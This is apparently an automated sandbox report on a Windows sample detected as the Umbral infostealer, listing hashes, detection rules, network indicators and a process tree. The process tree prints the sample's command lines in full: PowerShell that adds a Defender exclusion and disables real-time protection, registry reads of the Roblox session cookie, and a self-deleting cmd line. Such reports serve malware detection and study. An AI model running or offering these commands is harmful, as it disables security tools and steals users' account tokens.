Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
12-06-2024 03:42
Behavioral task
behavioral1
Sample
bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe
Resource
win7-20240221-en
General
-
Target
bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe
-
Size
234KB
-
MD5
65e7b5e4dd86e66cddd279dced3c31e5
-
SHA1
5b1836bd0519a866848d5867b42c9182066109bf
-
SHA256
bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e
-
SHA512
ccb978eddac4b06c992db66db63e08964f94181fb068c76281d5c6e13e69b85723a89780110f3a5fb7570a79ca24dff8d78270f13f1faa419a98715c1fbd3f14
-
SSDEEP
6144:tloZM9rIkd8g+EtXHkv/iD4WeANbYMTiqL9Y0hnT+Y8e1mki:voZOL+EP8WeANbYMTiqL9Y0hFI
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2008-1-0x0000000001100000-0x0000000001140000-memory.dmp family_umbral -
Detects executables attemping to enumerate video devices using WMI 1 IoCs
resource yara_rule behavioral1/memory/2008-1-0x0000000001100000-0x0000000001140000-memory.dmp INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice -
Detects executables containing possible sandbox analysis VM names 1 IoCs
resource yara_rule behavioral1/memory/2008-1-0x0000000001100000-0x0000000001140000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxComputerNames -
Detects executables containing possible sandbox analysis VM usernames 1 IoCs
resource yara_rule behavioral1/memory/2008-1-0x0000000001100000-0x0000000001140000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxUserNames -
Detects executables containing possible sandbox system UUIDs 1 IoCs
resource yara_rule behavioral1/memory/2008-1-0x0000000001100000-0x0000000001140000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxSystemUUIDs -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2832 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe -
Deletes itself 1 IoCs
pid Process 2128 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2668 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2944 PING.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2832 powershell.exe 3004 powershell.exe 2512 powershell.exe 2600 powershell.exe 1532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe Token: SeDebugPrivilege 2832 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe Token: SeDebugPrivilege 2512 powershell.exe Token: SeDebugPrivilege 2600 powershell.exe Token: SeIncreaseQuotaPrivilege 1240 wmic.exe Token: SeSecurityPrivilege 1240 wmic.exe Token: SeTakeOwnershipPrivilege 1240 wmic.exe Token: SeLoadDriverPrivilege 1240 wmic.exe Token: SeSystemProfilePrivilege 1240 wmic.exe Token: SeSystemtimePrivilege 1240 wmic.exe Token: SeProfSingleProcessPrivilege 1240 wmic.exe Token: SeIncBasePriorityPrivilege 1240 wmic.exe Token: SeCreatePagefilePrivilege 1240 wmic.exe Token: SeBackupPrivilege 1240 wmic.exe Token: SeRestorePrivilege 1240 wmic.exe Token: SeShutdownPrivilege 1240 wmic.exe Token: SeDebugPrivilege 1240 wmic.exe Token: SeSystemEnvironmentPrivilege 1240 wmic.exe Token: SeRemoteShutdownPrivilege 1240 wmic.exe Token: SeUndockPrivilege 1240 wmic.exe Token: SeManageVolumePrivilege 1240 wmic.exe Token: 33 1240 wmic.exe Token: 34 1240 wmic.exe Token: 35 1240 wmic.exe Token: SeIncreaseQuotaPrivilege 1240 wmic.exe Token: SeSecurityPrivilege 1240 wmic.exe Token: SeTakeOwnershipPrivilege 1240 wmic.exe Token: SeLoadDriverPrivilege 1240 wmic.exe Token: SeSystemProfilePrivilege 1240 wmic.exe Token: SeSystemtimePrivilege 1240 wmic.exe Token: SeProfSingleProcessPrivilege 1240 wmic.exe Token: SeIncBasePriorityPrivilege 1240 wmic.exe Token: SeCreatePagefilePrivilege 1240 wmic.exe Token: SeBackupPrivilege 1240 wmic.exe Token: SeRestorePrivilege 1240 wmic.exe Token: SeShutdownPrivilege 1240 wmic.exe Token: SeDebugPrivilege 1240 wmic.exe Token: SeSystemEnvironmentPrivilege 1240 wmic.exe Token: SeRemoteShutdownPrivilege 1240 wmic.exe Token: SeUndockPrivilege 1240 wmic.exe Token: SeManageVolumePrivilege 1240 wmic.exe Token: 33 1240 wmic.exe Token: 34 1240 wmic.exe Token: 35 1240 wmic.exe Token: SeIncreaseQuotaPrivilege 1436 wmic.exe Token: SeSecurityPrivilege 1436 wmic.exe Token: SeTakeOwnershipPrivilege 1436 wmic.exe Token: SeLoadDriverPrivilege 1436 wmic.exe Token: SeSystemProfilePrivilege 1436 wmic.exe Token: SeSystemtimePrivilege 1436 wmic.exe Token: SeProfSingleProcessPrivilege 1436 wmic.exe Token: SeIncBasePriorityPrivilege 1436 wmic.exe Token: SeCreatePagefilePrivilege 1436 wmic.exe Token: SeBackupPrivilege 1436 wmic.exe Token: SeRestorePrivilege 1436 wmic.exe Token: SeShutdownPrivilege 1436 wmic.exe Token: SeDebugPrivilege 1436 wmic.exe Token: SeSystemEnvironmentPrivilege 1436 wmic.exe Token: SeRemoteShutdownPrivilege 1436 wmic.exe Token: SeUndockPrivilege 1436 wmic.exe Token: SeManageVolumePrivilege 1436 wmic.exe Token: 33 1436 wmic.exe Token: 34 1436 wmic.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2008 wrote to memory of 2812 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 28 PID 2008 wrote to memory of 2812 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 28 PID 2008 wrote to memory of 2812 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 28 PID 2008 wrote to memory of 2832 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 30 PID 2008 wrote to memory of 2832 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 30 PID 2008 wrote to memory of 2832 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 30 PID 2008 wrote to memory of 3004 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 32 PID 2008 wrote to memory of 3004 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 32 PID 2008 wrote to memory of 3004 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 32 PID 2008 wrote to memory of 2512 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 34 PID 2008 wrote to memory of 2512 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 34 PID 2008 wrote to memory of 2512 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 34 PID 2008 wrote to memory of 2600 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 36 PID 2008 wrote to memory of 2600 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 36 PID 2008 wrote to memory of 2600 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 36 PID 2008 wrote to memory of 1240 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 38 PID 2008 wrote to memory of 1240 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 38 PID 2008 wrote to memory of 1240 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 38 PID 2008 wrote to memory of 1436 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 41 PID 2008 wrote to memory of 1436 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 41 PID 2008 wrote to memory of 1436 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 41 PID 2008 wrote to memory of 1644 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 43 PID 2008 wrote to memory of 1644 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 43 PID 2008 wrote to memory of 1644 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 43 PID 2008 wrote to memory of 1532 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 45 PID 2008 wrote to memory of 1532 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 45 PID 2008 wrote to memory of 1532 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 45 PID 2008 wrote to memory of 2668 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 49 PID 2008 wrote to memory of 2668 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 49 PID 2008 wrote to memory of 2668 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 49 PID 2008 wrote to memory of 2128 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 51 PID 2008 wrote to memory of 2128 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 51 PID 2008 wrote to memory of 2128 2008 bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe 51 PID 2128 wrote to memory of 2944 2128 cmd.exe 53 PID 2128 wrote to memory of 2944 2128 cmd.exe 53 PID 2128 wrote to memory of 2944 2128 cmd.exe 53 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2812 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe"C:\Users\Admin\AppData\Local\Temp\bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe"2⤵
- Views/modifies file attributes
PID:2812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1532
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2668
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\bdbc624e4c40d85f3927d8dc261ee069982728471bde7a245504c3e903f1234e.exe" && pause2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:2944
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5be13d8e9b515dba1efd3d514fb7944b5
SHA1ce6b9a8519122e200e6554d3c490ab7c08bd7ba3
SHA256b44fed8ee7c364591171e1914deb94e149308c32e73f34e7e5ad4ced76293770
SHA512a6e401bb583d0c4b3ba4caae4da91c5a17528da678d9fbf7212b6a3944b50e439fd1f0e41d5a857fd42814b29d242b0e0e1a352630af9fa0c19cef46f2b5d219